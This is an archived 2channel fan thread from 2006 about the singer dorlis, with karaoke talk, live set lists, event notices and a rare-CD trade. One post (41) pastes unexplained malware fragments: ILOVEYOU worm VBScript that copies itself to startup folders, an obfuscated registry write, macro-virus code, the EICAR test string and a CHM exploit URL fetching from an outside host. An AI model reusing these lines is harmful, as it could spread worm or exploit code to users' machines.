5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【Happy】dorlisはどーです?☆4【swing】

1 :名無しの歌姫:2006/06/14(水) 16:48:17 ID:Sg8B1Vqx
これがdorlisのドライブミュージック
『太陽のスキャット』発売中

また今年はシングル、アルバムも発売予定!
今後も期待!

dat落ちすることを考えて
dorlis掲示板 http://yy21.kakiko.com/dorlis/ も用意しました。
また落ちちゃった時には↑ここを覗いてみて下さい。落ちてない
ときに利用してもOKです。

前スレ
【1.19】☆dorlisってどーです?☆3【マリポーサ】
http://music5.2ch.net/test/read.cgi/musicjf/1103468512/
【ジャジー】☆dorlisってどーです?☆【スウィンギー】
http://music4.2ch.net/test/read.cgi/musicj/1066013000/
【ジャージー】☆dorlisってどーです2☆【シンギー】
http://music4.2ch.net/test/read.cgi/musicj/1095656713/

2 :名無しの歌姫:2006/06/14(水) 16:58:19 ID:dkgLS9kb
ビクター公式
http://www.jvcmusic.co.jp/dorlis/
SUPALOVE公式
http://www.jvcmusic.co.jp/dorlis/
携帯
http://pksp.jp/dorlis/


3 :名無しの歌姫:2006/06/14(水) 17:05:16 ID:dkgLS9kb
一応立てた感じです。
4スレ目ですので、テンプレとか決めますかね?

4 :名無しの歌姫:2006/06/14(水) 21:22:19 ID:jbWoT0T+
乙カレー(・∀・)
テンプレ欲しいけどここまで進行遅いと悩むお

公式URLが二つとも同じな件

5 :名無しの歌姫:2006/06/14(水) 21:49:13 ID:Sg8B1Vqx
>>4
やっとひと来た。
うん、すまん。次は直そう。

6 :名無しの歌姫:2006/06/14(水) 21:54:21 ID:Sg8B1Vqx
SUPALLOVE公式
http://www.supalove.com/dorlis/
こっちが正解。

ついでじゃないが、ジャケ買いした人用
dorlisのイラストを手がけているまえだゆかさんのホームページ
http://www.flavorgirl.com/

7 :名無しの歌姫:2006/06/16(金) 03:48:20 ID:MRRnfGuW
話題がないからか誰もこねぇ

8 :名無しの歌姫:2006/06/16(金) 13:17:34 ID:6Yd/7vQ9
現状じゃこっちで話題つくっても誰もこねぇ(´・ω・`)

9 :名無しの歌姫:2006/06/17(土) 01:24:44 ID:ZlQcCl/d
男だけど、dorlisはあんま高くないからカラオケでも歌いやすいね

10 :名無しの歌姫:2006/06/17(土) 08:56:37 ID:KA0gt9lK
カラオケでdorlis祭りしたいんだけど現状じゃ曲目数スクナス(´・ω・`)
どりちゃんの曲が多いのってどこだろ
DAM少なかったしなあ

11 :名無しの歌姫:2006/06/17(土) 09:03:30 ID:vR1cmlvL
オレも裏声で歌いまくりw
音の上がり方がキモチイイよね

ダムは三曲確認。マリポーサと肌のすきまとスキャット
で、名前忘れたが、画面が静止画のみな機種はいっぱい入ってる
二十四時間も入ってたな

12 :名無しの歌姫:2006/06/17(土) 10:09:14 ID:KA0gt9lK
> 二十四時間も入ってたな
!!!!!!!!!!!!!111111!!
kwsk思い出してください><

13 :名無しの歌姫:2006/06/17(土) 17:04:30 ID:vR1cmlvL
カラオケ板できいてください><

ちょっとググッたけど、ジョイサウンドが7曲だた。
いっぱいって言っちゃったけど、これかも。
二十四時間入ってるし。

14 :名無しの歌姫:2006/06/18(日) 03:29:57 ID:EPAxDBxr
ちょっと盛り上がったwうれしいw
オレはミックスボイスで歌ってるよ

メロディが気持ちいいよね

15 :名無しの歌姫:2006/06/18(日) 05:42:20 ID:lhuhB6Kd
以外に男でも歌ってるのがいてなんか嬉しいw


聴いたら好きになる音&あのルックスとセンスの良さなのに、
知名度が低いのは勿体無いと思うなぁ
結構カラオケとかでもアクセントになり得るし、口ずさみやすい曲多いし

16 :名無しの歌姫:2006/06/18(日) 10:33:55 ID:2FvC1kIN
しかし歌うのが下手な俺にdorlisは難問であった _| ̄|○

知名度低いのは勿体無いと思うよなあ
しかし、にわかファンが増えるのは嫌だというエゴを持ってる俺ガイル

17 :名無しの歌姫:2006/06/18(日) 21:23:16 ID:SxEyXnRg
>>16
わかるよ あんまり売れすぎると寂しいよねw

18 :名無しの歌姫:2006/06/19(月) 01:06:05 ID:zYuyTgs2
>>17
IDおしいw

売れすぎると寂しいけど、やっぱもっとTV露出あったら一気にくるタイプだよ
ドリタソは。

19 :名無しの歌姫:2006/06/19(月) 09:47:03 ID:h9kQkf66
どりたんの曲聴いたら一気にくるよな。聴く機会が少ないだけなんだが
もっとライブきぼん@関西

20 :名無しの歌姫:2006/06/19(月) 15:53:11 ID:h3xTNCpk
ほしゅ

21 :名無しの歌姫:2006/06/19(月) 20:22:41 ID:0Q9ozKjE
知名度上がってメディアに出たら
事務所の圧力とかで今と変わっちゃいそうな感じする。

確かににわかファンが増えるのヤダw

22 :名無しの歌姫:2006/06/20(火) 12:36:21 ID:0PalrY7C
にわかファンの定義って何?

23 :名無しの歌姫:2006/06/20(火) 12:43:54 ID:av4nxGMC
あんまりそういう定義とか好きじゃないなぁ。
まだファンクラブもないでしょ。

24 :名無しの歌姫:2006/06/20(火) 16:46:00 ID:0PalrY7C
>>23
22だけど、自分もそういう定義好きじゃないからさ。
にわかって何なんだろうと思って。
ファンクラブの有無は関係ないと思うけどw

ドリタソハァハァ、写真隠し撮りして萌え〜(w なら嫌だがwww

25 :名無しの歌姫:2006/06/20(火) 16:57:01 ID:av4nxGMC
そういうことか、ごめんね(´・ω・`)

まぁ、ドリタソ美人だからなあ。ハァハァするよか、
ボーッと眺めちゃう感じ。
あくまで個人の感想だけどさ、ショートは凄く似合ってるよね

26 :名無しの歌姫:2006/06/21(水) 09:19:03 ID:wDb/LLEl
ライブ・イベント出演

東海地区の皆さん
”TREASURE 052 with ZIP-FM  〜voice alliance〜”
dorlis出演決定です!!

日程: 2006年8月23日(水) 
時間: OPEN 17:30 / START 18:00
会場: 名古屋ダイアモンドホール

出演:dorlis , いきものがかり, 笹川美和, naomi yoshimura, 山田タマル
チケット:全自由席  3500円(税込)
7月16日(日)10:00 一般発売開始
TANK! the WEB http://www.sundayfolk.com/
ダイレクトセンター052-320-9000
チケットぴあ0570-02-9999
<お問い合わせ>
サンデーフォークプロモーション 052-320-9100(全日10:00-18:00)
TANK!the WEB   http://www.sundayfolk.com/

27 :名無しの歌姫:2006/06/21(水) 19:25:15 ID:ZNF6v+2b
名古屋でやるのか。
行けないなぁ・・・・

28 :名無しの歌姫:2006/06/25(日) 09:21:14 ID:O52BQ8TC
おまいらおはよう(´・ω・`)

29 :名無しの歌姫:2006/06/25(日) 23:20:09 ID:ojbR6qLp
こんばんわ

30 :名無しの歌姫:2006/06/26(月) 21:00:04 ID:C+ceosko
ぐ〜るぐるあげっる♪

31 :名無しの歌姫:2006/06/26(月) 21:39:48 ID:eshji/pL
またグルグルageに逆戻りか
ネタがないよねえ

32 :名無しの歌姫:2006/06/27(火) 00:15:43 ID:if4F3QXZ
おまいら
今週末は横浜でライブですよ

33 :名無しの歌姫:2006/06/27(火) 00:56:00 ID:BRj8Cl7t
横浜まで週末にぱっと行けないもんなぁ。

34 :名無しの歌姫:2006/06/27(火) 02:21:49 ID:dblF3VXT
横浜トオス(´・ω・`)

35 :名無しの歌姫:2006/06/27(火) 23:10:31 ID:KGidKgI/
トレス・ドス・ウノage

36 :名無しの歌姫:2006/06/28(水) 10:32:09 ID:QUTdTz+f
横浜と札幌ライブDVD希望揚げ

37 :名無しの歌姫:2006/06/30(金) 12:52:05 ID:BkvgU9Du
やべえよ。7/22ドーリス安比高原に来ちゃうよォ!

38 :名無しの歌姫:2006/06/30(金) 14:00:28 ID:471q4y1n
トオス(´・ω・`)
遠征しようにも前期試験期間中なんだぜ?

39 :名無しの歌姫:2006/06/30(金) 15:50:50 ID:C01vWbAv
CD整理してたら、マーブルの月のデモみたいなのが出てきた。
1曲目がマーブルの月で2曲目が記憶の万華鏡のなんか大人しいつーか
いかにもデモっぽいやつ。

久々に聞いてみたが、やっぱりいいねー。
新宿高島屋だかの浴衣ライブ行こうとして、
急用で行けなかったのが今更悔やまれる。

40 :名無しの歌姫:2006/06/30(金) 20:46:29 ID:y8iuAVZZ
>>39
なんでそんなものもってるんw
デモとか普通じゃ手に入らないようなものなんじゃないの?

41 :名無しの歌姫:2006/07/02(日) 02:02:43 ID:MGs08Jjs
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

42 :名無しの歌姫:2006/07/02(日) 12:09:27 ID:rYbCQ2lr
専ブラでつながらないのは上のやつのせいか?

43 :名無しの歌姫:2006/07/02(日) 12:56:03 ID:DtQdgJO0
>>41が見えないんだがスクリプト貼り付けてんのか?
上のやつは関係ないはず
VIPが落ちてたからそのリブートの影響じゃないかなー、と個人的に思う

44 :名無しの歌姫:2006/07/03(月) 01:22:12 ID:LUXu+TLQ
ギターフリークスで初めて知って、今ではすっかりdorlisのファンになりました。
これからちょくちょく覗かせてもらうのでよろしくお願いします。

45 :名無しの歌姫:2006/07/03(月) 14:09:24 ID:wbGEarkt
そういやギタフリにあるね。なんだかんだで露出してるのか

週末のライブどうだったんだろ、レポしてくれる人いないかな

46 :名無しの歌姫:2006/07/06(木) 00:05:30 ID:iwRxz2TS
今週末横浜ライブ行くです。
がんばって安比のライブも行こうかと考えてます。
覚えてたらレポしたいと思います

47 :名無しの歌姫:2006/07/06(木) 09:09:39 ID:tj/NEk5e
レポwktkwktk

48 :名無しの歌姫:2006/07/06(木) 21:47:43 ID:6iToBk1i
あげ

49 :名無しの歌姫:2006/07/07(金) 15:33:30 ID:PAM195Be
おい関西人!

●関西TV情報

■7月10日(月)
MBS(毎日放送4ch)「MUSIC EDGE」出演決定!
http://mbs.jp/edge/index2.html
24:55〜O.A
dorlis出演。重大発表あります!!


テレビ出演キタ――♪ o(゚∀゚o) (o゚∀゚o) (o゚∀゚)o キタ――♪
EDGE出演って何度目だろ?2度目?
重大発表wktk

50 :名無しの歌姫:2006/07/08(土) 11:34:35 ID:5MQo2U9/
>>49
GJ!!
今度こそ録画するぞ!!






あげあげ

51 :名無しの歌姫:2006/07/08(土) 13:14:08 ID:jSUCwCN9
黒川芽以がファンなんだって

52 :46:2006/07/09(日) 09:48:33 ID:X3OrJIbn
横浜ライブいってきました

まず曲から…
1.マリポーサ
2.太陽のスキャット
3.肌のすきま
4.ダブルエイジェント
5.市民プール(新曲らしい)
6.記憶の万華鏡
7.ダンスはうまく踊れない
(バリスイッチ?の水野真理?さん登場。二人でコーラス)
8.靴擦れ(24時間カップリングの指先バージョン)
9.月ドロボウ
10.恋のバーグラー
11.ひとりごとみたいにアイシテタ
12.八重芯
アンコール
13.24時間
14.マーブルの月

服装はマリポーサジャケの服(紫ワンピと黒いアミアミ)
髪はswingin partyっぽい感じ(後ろくしゃっと)


こんな感じ??
おもしろかったよーー


53 :名無しの歌姫:2006/07/09(日) 10:29:09 ID:gGmX26w5
>>52
乙!
ライブ全体、観客のふいんき(何故か変換dry)とかどうさ?
レポート調にまとめてくれるとありがたいんだが

54 :46:2006/07/09(日) 13:04:10 ID:X3OrJIbn
>>53
低学歴なオレにはレポート調がいまいちわからん

今回は20歳以上限定ライブで服装もみなさま落ち着いた感じ
年は見た感じ20〜28くらいが多く見えた
会場は狭めのカフェ
案の上女性が多く7:3くらい
相変わらずドリタソは楽しそうにPLAYしてました(特に水野さんが混ざったとき)
オタクチックな人はいなかった
あとは酔っ払ってて覚えてない


55 :名無しの歌姫:2006/07/09(日) 14:01:21 ID:MqCNmrbv
>>52
>市民プール

…すごく気になる…。

56 :46:2006/07/09(日) 14:24:10 ID:X3OrJIbn
>>55
市民プールのサビの歌詞
「市民プールではしゃぐ君は〜いつもよ〜り・・・」
みたいな感じ

曲調はバラード。松井ひできの「家ではスローにん」っていってるCMの
一青窈の曲に似てる気がした。
いい曲でした

57 :名無しの歌姫:2006/07/10(月) 20:18:07 ID:ZtNUHa9m
>>54

[669]Re:667
BY:中埜実(亀井)
>べてぃ さん
うちわパタパタしていた張本人です。
この場(掲示板ね)を汚したくありませんので、早めに謝罪させてください。
7/8の横浜にいらしてたdorlsファンの皆さま、度を過ぎた行動をとってしまい、たいへん申し訳ありませんでした。弁解の余地は全くありません。
今後は、再発防止に努めますので、どうかひとつ、よろしくお願い申し上げます。
再発防止策:ライブ前にアルコールを絶対飲みません。
07/09 21:40[i]



これか?
てかスペルまちがっとるがな


58 :46:2006/07/10(月) 21:37:23 ID:22wJjWN5
>>57
オレも公式サイトでそれ読んだ。
酔っ払っていたが迷惑かけるほどでは到底ない。
サイト読んだ感じだとこの人は前の方にいたっぽいが
オレは一番後ろの席だった・・・orz


まぁ、とりあえず違う





59 :57:2006/07/11(火) 03:13:46 ID:0WQ8kd+x
>>58
誤爆スマソ
てかそんなヤツいたらいややわー




TV出演短いわorz


60 :名無しの歌姫:2006/07/11(火) 03:37:18 ID:02dw16U5
出演情報貼った本人なのに体調不良で寝込んで見逃したおorz

重大発表についてkwsk

61 :名無しの歌姫:2006/07/11(火) 07:56:45 ID:rTt1VulD
8月6日オーサカキングのライブイベントに出るってさ
ヽ(´∀`)ノ

あと小ジョンさん持ってた


2分くらいの出演かなw

62 :名無しの歌姫:2006/07/11(火) 08:07:32 ID:02dw16U5
ktkr!!!!!!1111

dクス
一人寂しく行くお(;^ω^)

63 :名無しの歌姫:2006/07/14(金) 22:07:00 ID:FBttzyzt
age

age

64 :名無しの歌姫:2006/07/14(金) 23:11:52 ID:IO0fwY3m
安比ライブ逝きますよ!
dorlisイイよね!!!

65 :名無しの歌姫:2006/07/15(土) 00:06:51 ID:DTu0n/Wn
ライブレポwktk

 ∧_∧  +
(0゜・∀・) wktk
(0゜∪ ∪ +
と__)__) + 

66 :名無しの歌姫:2006/07/15(土) 08:36:46 ID:8YkWaJAE
まかせて!覚えてたら^^;
生まれて初めてのライブ!dorlis!レポ!だけどなんとかやってみると思う。

あと、22日の安比ライブに逝く人どのくらいいるの???

67 :46:2006/07/15(土) 12:14:14 ID:zRaC+ySV
横浜ライブ軽くレポったものです

安比行きますよ〜




68 :迦楼羅:2006/07/15(土) 17:35:45 ID:8YkWaJAE
もう名無しやめてHN使いますかね。
えっと〜モバイルサイトの方でちょくちょく長文書いてる迦楼羅です。。。
携帯で見ている方にとっては迷惑だったかなぁ〜って思っているんですが><

初のライブということでどんなカンジか緊張するなぁ〜;;

69 :迦楼羅:2006/07/15(土) 17:36:54 ID:8YkWaJAE
↑ちなみに、>>64 >>66 の者です。

70 :名無しの歌姫:2006/07/17(月) 20:53:38 ID:mvwXM6vX
APPI
http://www.youtube.com/watch?v=o_8uLYOSrX0

71 :名無しの歌姫:2006/07/18(火) 10:46:42 ID:NfH/JAH1
>>68
コテは痛いからやめとけw

72 :名無しの歌姫:2006/07/18(火) 18:32:57 ID:kqBN0tD+
そぅですね^^;
今ちょっと後悔;;
まぁAPPI終わればもぅココには現れないと思います。

73 :名無しの歌姫:2006/07/18(火) 19:20:43 ID:UEcIkNqM
>>72
ID変わってから何事もなかったかのように書き込めばおk
普通にレポ書く→ID変わる→何事もなかったかのように住人となる
(゚д゚)ウマー

74 :名無しの歌姫:2006/07/19(水) 03:06:37 ID:1PCmZvXO
オレンジペコーあたりのパクリでしょ?

75 :名無しの歌姫:2006/07/19(水) 21:24:17 ID:JyAqGE0Q
>>73
とてもありがたいお言葉><
本当にありがとうございます^^
うまく姿を消していきますね!

76 :名無しの歌姫:2006/07/19(水) 23:25:26 ID:BT1qWLnE
大阪キングに行こうよ

77 :名無しの歌姫:2006/07/20(木) 02:56:16 ID:vM7T/jOg
>>75
おまwwwww
いちいちレスに反応してたらバレバレじゃねーかwwwwwwwwwwwwwwww

>>76
オーサカキングには興味なかったが俺いくお^^

78 :黒いトマ:2006/07/21(金) 01:56:04 ID:UxkYT5Dc
みなさん、dorlisのライブラ情報とか何処で得てるの??
うまく新しい情報が見つからなくて・・・・・。
親切な方教えて下さい。(__)




79 :名無しの歌姫:2006/07/21(金) 03:09:15 ID:7u+ljhhG
まず2chにきたら半年ROMれ
そうすれば公式サイトで情報が手に入ることくらいわかるお( ^ω^)

べ、、べつに教えたくて教えたわけじゃないんだからねっ!!!

80 :名無しの歌姫:2006/07/21(金) 04:22:26 ID:UxkYT5Dc
分かりました。今から半年ROMります!!
ありがとうごさいました。


81 :名無しの歌姫:2006/07/21(金) 17:19:40 ID:uhkfpqSh
新曲期待。まだ発売決まってないよね?

82 :名無しの歌姫:2006/07/21(金) 18:41:50 ID:7u+ljhhG
>>81
漏れはまだ情報持ってない


誰かオーサカキングいかね?
一人サミシス(´・ω・`)

83 :名無しの歌姫:2006/07/22(土) 00:13:58 ID:vZVen1Ts
明日、仕事帰りに安比行ってくるかな?
と、言っても片道1時間かかるけど、、

84 :名無しの歌姫:2006/07/22(土) 13:58:04 ID:XmfAeBVg
>>82
そっか、まぁでも出すみたいなこと書いてあったし、気長にまてか。
男でいいなら行くぜw

85 :名無しの歌姫:2006/07/22(土) 21:42:09 ID:yeK42xrb
>>82
私も行きますよー

86 :名無しの歌姫:2006/07/22(土) 23:39:32 ID:oq335oa4
>>84>>85
ktkr!!!!!!!!1111
男でいいならつれてけwwwwwwwwwww

87 :名無しの歌姫:2006/07/23(日) 15:32:04 ID:S+wFepNv
今日競馬で
エーシンマリポーサって馬がデビュー勝ちしたぞ

88 :名無しの歌姫:2006/07/23(日) 16:19:15 ID:49kLMPYT
先に書かれたwwwww
縁起担いで買ったら当たったお( ^ω^)
1番人気で配当少なかったのに・・・何を思ったか換金してしまったorz

89 :名無しの歌姫:2006/07/23(日) 16:53:19 ID:EjBAU6WD
八重心マリポーサ?

90 :名無しの歌姫:2006/07/23(日) 18:03:01 ID:WKx22R5x
エイシンマリポーサだからw

91 :名無しの歌姫:2006/07/23(日) 20:06:29 ID:If728A5a
キン肉マンマリポーサ?

92 :名無しの歌姫:2006/07/24(月) 01:26:52 ID:30BElF+9
残念
エーシンです

93 :名無しの歌姫:2006/07/24(月) 15:48:23 ID:xuXQuzoN
CMktkr!

94 :名無しの歌姫:2006/07/24(月) 15:57:05 ID:wtU3N8R8
>>93
CMkwsk!!!!!

95 :名無しの歌姫:2006/07/24(月) 15:57:41 ID:wtU3N8R8
連投スマソ


◆9月2日(土)
dorlis 関西地区 1年ぶりのクラブイベント
「BOSSANOVA underground」出演決定!!

場所;NOON-NAKAZAKI DEPOT-
info@noon-web.com
open/start 21:00〜

Adv 2,000yen(With 1drink) / Door 2,500yen(With 1drink)

チケット取扱店
digmeout CAFE(06)4390-5681、NOON(06)6373-4919
seeed(06)6373-2242、大阪cisco(06)6252-9821

e-mailチケット予約
info@afterjazz.com
info@noon-web.com

LIVE
■井手麻理子 ■dorlis
DJ
■櫻井喜次郎 ■岩瀬純生 ■Chiaki(Dois na
bossa) ■瀧尻昌季 ■徳田和紀
VJ
■LTI VISIONS
ART
CALL it BLAVO! GALLERY
■未定
Live Paint
■未定
CAFE
■Matsuura Ai

Web infornmation
ttp://www.afterjazz.com
ttp://www.noon-web.com

96 :名無しの歌姫:2006/07/25(火) 19:17:19 ID:iTdQhblr
銀色プレゼント持ってる人〜!
あれもぅ手に入る手段ってないん?

97 :名無しの歌姫:2006/07/27(木) 01:44:43 ID:hcyvEMAb
>>96
マルイのタスタスにあるかも。

98 :名無しの歌姫:2006/07/27(木) 17:56:10 ID:utVGyI5c
>>97
たしか限定1000枚のレア物なんですよ〜。
まぁ、もしもオークションに出ていて買うとしても5000円くらぃまで出すのが限界ですが。。。(まぁこれくらい出せば買える!?)

99 :97:2006/07/28(金) 00:29:05 ID:0aQXyEJb
>>98
去年の12月ごろにはまだハンカチつきでありました。


100 :名無しの歌姫:2006/07/28(金) 10:03:23 ID:BP86V8uh
>>99
去年は再発売したんだよ

101 :名無しの歌姫:2006/07/28(金) 14:52:39 ID:Ik4XujLF
「銀色プレゼント」持っててdorlisに飽きちゃった人売ってくれる人ないかなぁ。。。
まぁ、出すならyahoo!オークションとかでいいですが。。。

ハンカチ付きで、帯もあって結構綺麗な状態だったら5000円くらいまでは出せるかも、、、しれない。
ただ、狙ってる人は狙ってると思うからそこはバトル次第だね。。。

102 :名無しの歌姫:2006/07/28(金) 17:35:50 ID:Ik4XujLF
一応、age。

103 :97:2006/07/29(土) 17:08:44 ID:kd2RuZ+Q
明日tasstassに行くんで店員に聞いてきてみます。
あったら買ってきます。

104 :名無しの歌姫:2006/07/29(土) 17:58:27 ID:2+4qc/Im
おぉ〜w
買ってくるってオークションに出すって意味!?
それとも自分用???
まぁ、有ったらいいね^^

105 :名無しの歌姫:2006/07/29(土) 18:29:40 ID:XIj/55Gm
俺一人でタスタスに行きづらい件


・゚・(つД`)・゚・

106 :97:2006/07/30(日) 13:15:02 ID:PbKXLVqI
銀プレ買ってきたよ。
私いらないからオークションにだしたほうがいいですか?

107 :名無しの歌姫:2006/07/30(日) 13:31:48 ID:t5vBVq+f
>>106
むしろ俺が今から買う

108 :97:2006/07/30(日) 14:53:33 ID:PbKXLVqI
107
手に入ったんですか?

109 :名無しの歌姫:2006/07/30(日) 14:54:58 ID:t5vBVq+f
>>108
おまいから買うという意味であった
さすがに男一人でタスタス行くのには抵抗が・・・
今の時期友人忙しいしな

110 :名無しの歌姫:2006/07/30(日) 17:35:42 ID:h7UQKWB/
ってか売ってたのか!!!
オークション出すならヤフーでねw
あと、ハンカチ付いてないと5000円は出せないなあ。。。
でもきっと結構レアなCDだから、オークションに出すだけでも結構利益は出ると思う^^

ってか、とにかくGETしたい!
ハンカチ付いてるの?

111 :97:2006/07/30(日) 20:03:33 ID:RyZ/phWo
ハンカチついてます。
まえだゆかのイラストの包装紙でつつんであるから中を確認していないけど店員に確認しました。
ほしい人いっぱいいるの?
tasstassにはまだ2枚ほど売っていたけど。

112 :名無しの歌姫:2006/07/30(日) 20:19:24 ID:h7UQKWB/
>>96 >>98 >>101 >>102 >>104 >>110だけど、
ぜひ売って欲しい!!!!!!!
マジお願いします!


113 :名無しの歌姫:2006/07/30(日) 20:24:31 ID:t5vBVq+f
めっさほしい(´・ω・`)
定価の2倍3倍でも買うお(´・ω・`)

114 :名無しの歌姫:2006/07/30(日) 20:48:22 ID:h7UQKWB/
オークションなら
    α(入札額)+代引き+送料=5000円 
                  くらいまでならたぶん入札できる。
普通に取引だったらもっともっと低いだろぅけど。。。
でも本気で売ってくれませんか?

115 :97:2006/07/30(日) 21:01:31 ID:RyZ/phWo
2人ね。
もう1枚買ってくるから。
あとでフリーのアドとって載せるよ。


116 :名無しの歌姫:2006/07/30(日) 21:23:57 ID:t5vBVq+f
ちょwww
マジでいいの???
うあ・・ものっそ申し訳ない(´・ω・`)

117 :97:2006/07/30(日) 21:31:40 ID:RyZ/phWo
giniropresent@yahoo.co.jp

112の方か113の方か投稿の番号をいれて送ってくださいね。
それともうここには「97」としては書き込みませんね。
それでは。

118 :名無しの歌姫:2006/07/30(日) 21:55:19 ID:t5vBVq+f
>>117
( ^ω^)人(・∀・`)



オーサカキングまであと1週間

 ∧_∧  +
(0゜・∀・) wktk
(0゜∪ ∪ +
と__)__) + 



119 :112:2006/07/30(日) 22:42:53 ID:h7UQKWB/
あれ、、、ヤフーメールでやりましたが送信出来ない><
フリーのメールアドレスのっけてるので97さん送信していただけますでしょうか???

お願いします。

120 :名無しの歌姫:2006/07/30(日) 22:44:35 ID:t5vBVq+f
>>119
コピペじゃだめだお
なんか記号がでっかいお

121 :112:2006/07/30(日) 22:45:44 ID:h7UQKWB/
あぁ〜〜\(^◇^)OK!
解決しました!
今送りますね!!!

122 :名無しの歌姫:2006/08/01(火) 01:33:02 ID:YghYMI3g
オーサカキングLIVEスカッ!とスウィング!!

MUSIC EDGEでの宣伝に10秒〜15秒程度どりちゃんビデオ出演
まあいわゆる告知ですな

123 :名無しの歌姫:2006/08/02(水) 21:17:47 ID:FXsR4H7T
銀色プレゼント 欲しがってる人がこんなにいたなんて
すまん、初回版を当時3枚買っちまった

124 :名無しの歌姫:2006/08/03(木) 23:02:16 ID:2Pzhu8im
age


125 :名無しの歌姫:2006/08/04(金) 09:47:18 ID:gdaU1wP6
>>122
(´・ω・`)もうちょっと早く

126 :名無しの歌姫:2006/08/04(金) 12:33:49 ID:KSLqMSHx
>>125
すまん
俺も知らずにEDGEみてたらビデオ出演されたんだ(´・ω・`)
ただの事後報告になってしまった




オーサカキングLIVEスカッ!とスウィング!!まであと2日

127 :名無しの歌姫:2006/08/04(金) 14:24:09 ID:gdaU1wP6
俺も途中まで見てたけど出そうな雰囲気なかったから変えた(´・ω・`)俺がわりぃんだorz
オーサカキング何曲歌うんやろかいな

128 :名無しの歌姫:2006/08/04(金) 18:58:20 ID:KSLqMSHx
つ関東


ライブ・イベント出演

***bayFM「P ARK〜 presents Mid Summer Party〜」***

bayFMの公開録音番組です。dorlis,生演奏有り!
日程: 2006年8月13日(日) 
時間: START 14:00
会場: エンターテインメント・スタジオ・ピーアーク 特設会場
出演: dorlis/ニブンノゴ/千原兄弟/安倍なつみ
DJ: 竹山まゆみ

…………………………………………………………………………………………………………………………………………
TV・FM番組出演

■関東ラジオ出演情報!

■8月19日
bayfm「P ARK presents Mid Summer Party 」(時間の詳細は後ほどUP致します)
生演奏有り!出演はdorlis他、ニブンノゴ 、千原兄弟、安倍なつみ、です。







いいなあ(´・ω・`)

129 :名無しの歌姫:2006/08/06(日) 16:28:09 ID:9bUo6Iob
オーサカキングいいなァ(´・ω・`)仕事のヽ(`Д´)ノアホォォォ
行ってる人レポよろしくね!

130 :名無しの歌姫:2006/08/06(日) 21:14:44 ID:RRWvplf7
オーサカキング セットリスト
1 24時間世界一周
2 マリポーサ
3 肌のすきま
4 太陽のスキャット
5 磁石の肌

新曲のトラックダウンを今やっているところで、
出るのは秋になるとのことでした。


131 :名無しの歌姫:2006/08/06(日) 21:39:59 ID:9bUo6Iob
>>130
dクス
好きなんばっかやわ
ヽ(`Д´)ノウワァァン
行きたかった(´・ω・`)

ライブ自体はどーでした?

132 :後藤さん:2006/08/06(日) 21:47:02 ID:CjeL5WAX
行きたかった〜〜〜!
仕事で見れなかったよ;;

いろいろ情報見たけど、オレンジ浴衣におかっぱだったんすか???
しかも最後は3組のバンドが一緒に歌ったとか???kwskお願いする。。。


133 :後藤さん:2006/08/07(月) 00:00:12 ID:O3NYpaKv
ぅわ〜〜〜〜さすがmixi!
今日のカンジがすげ〜よくわかる。
見たかったな〜〜〜;;

134 :名無しの歌姫:2006/08/07(月) 00:27:38 ID:mCBB0aJ6
ただいま・・・


テラ疲れた・・・

135 :名無しの歌姫:2006/08/07(月) 06:39:59 ID:M8OsH7Z6
遅くなったが、昨日のレポ。

・「肌のすきま」で出番の無いバックバンドのブラス隊の3人が
 指パッチンダンス(?)を披露。曲の最後の方でドリが気付き、
 「そんなのやるなんて聞いてないよ〜。しっとりやりたかったのに」
 と悔しそう。
・「磁石の肌」ではUKとジョンさんも参加して皆で手を振ったりして
 盛り上がった。

 衣装は浴衣。dorlisだけでなくバンド全員が浴衣。髪型はおかっぱだった。

136 :後藤さん:2006/08/07(月) 07:50:22 ID:O3NYpaKv
なんか昨日のセットリストは、初めて聞く人もいいと思える曲ばかりな気がする。
まぁ、dorlisしか作れないような珍しい曲(マニアックとでも言うか。)にハマる人(漏れも含むw)も多いだろうが。。。

それにしても、いろんな人のblogとか見ているが、評判はまぁまぁ良さそうじゃないかなw
また一人また一人ファンが増えてってると思う。
いつかは有名になるだろうdorlisも。

137 :名無しの歌姫:2006/08/14(月) 11:39:52 ID:aBe86Xwr
オーサカキングのライブ映像MUSIC EDGEで流さないの?

138 :名無しの歌姫:2006/08/16(水) 22:54:37 ID:3YZYPeNc
過疎過ぎやしないか?w
オカッパ止めるんか(´・ω・`)好きやってんけどな-

139 :名無しの歌姫:2006/08/17(木) 00:50:19 ID:6Nup5To/
ってかホント綺麗な人だよねー。
なんかすんごい眼力あるけど、ライブのときにカラーコンタクト入れてるのかなーって思ったんだけど、どー思う?ゴメンw疎いから分かんないんだ^^;まぁカラコンだとは思うんだけどさ。。。

140 :名無しの歌姫:2006/08/17(木) 13:39:07 ID:Q5Z6q1/p
おかっぱやめるの?好きだったのに

141 :名無しの歌姫:2006/08/20(日) 17:34:07 ID:eUbhaoFv
>>139
